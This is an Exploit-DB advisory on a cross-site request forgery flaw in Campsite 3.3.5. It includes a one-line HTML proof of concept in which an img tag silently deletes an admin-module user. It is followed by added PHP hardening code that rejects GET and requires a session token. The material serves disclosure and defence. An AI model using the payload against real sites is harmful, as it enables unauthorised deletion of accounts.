Campsite v3.3.5 CSRF Vulnerability



EDB-ID: 11676 | CVE: N/A | OSVDB-ID: 62851
Author: Pratul Agrawal | Published: 2010-03-10 | Verified: Verified
                     =======================================================================
                                         campsite 3.3.5 CSRF Vulnerability
                     =======================================================================
                                                     by
                                                Pratul Agrawal
  # Vulnerability found in- Admin module
  # email         Pratulag@yahoo.com
  # company       aksitservices
  # Credit by     Pratul Agrawal
  # Category  	  CMS / Portals
  # Site p4ge     http://wwwcampware.org/
  # Platform      PHP
  #  Proof of concept   #
  Targeted URL:  http://server/admin/login.php
  Script to delete the Admin user through Cross-Site Request Forgery
             .  ..................................................................................................................
                        <html>
                          <body>
                           <img src=http://server/admin/users/do_del.php?User=[userID]&uType=Staff />
                          </body>
                        </html>
             .  ..................................................................................................................
  After execution, refresh the page and you can see that the user with the given ID has been deleted automatically.
#If you have any questions, comments, or concerns, feel free to contact me.
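
The request above succeeds because the delete action is reachable with a plain GET and carries nothing a third-party page could not supply. The following is an added example, not code from Campsite or from the advisory's author: a hardened delete check that rejects GET and requires a per-session token. The function names, the csrf_token field and the numeric user ID are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened check for a user-delete handler.
declare(strict_types=1);

/** Return the per-session CSRF token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Return an HTTP status: 204 = delete may proceed, otherwise rejected. */
function authorize_delete(string $method, array $post, array &$session): int
{
    // State-changing actions must not answer GET: an <img> tag only sends GET.
    if ($method !== 'POST') {
        return 405;
    }
    // The token lives in the session and in the admin form only, so a page
    // on another origin cannot include it. Compare in constant time.
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token($session), $sent)) {
        return 403;
    }
    // Assumption: user IDs are numeric.
    $user = $post['User'] ?? '';
    if (!is_string($user) || !ctype_digit($user)) {
        return 400;
    }
    return 204;
}

// Constructed sample requests, in place of $_SERVER, $_POST and $_SESSION.
$session = [];
$token = csrf_token($session);
$cases = [
    'GET via <img> tag'  => ['GET', []],
    'POST without token' => ['POST', ['User' => '7', 'uType' => 'Staff']],
    'POST with token'    => ['POST', ['User' => '7', 'uType' => 'Staff',
                                      'csrf_token' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    printf("%-20s => %d\n", $label, authorize_delete($method, $post, $session));
}
```

In a real handler the three arguments would be $_SERVER['REQUEST_METHOD'], $_POST and $_SESSION, and the admin form would emit csrf_token($_SESSION) in a hidden field.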
                    





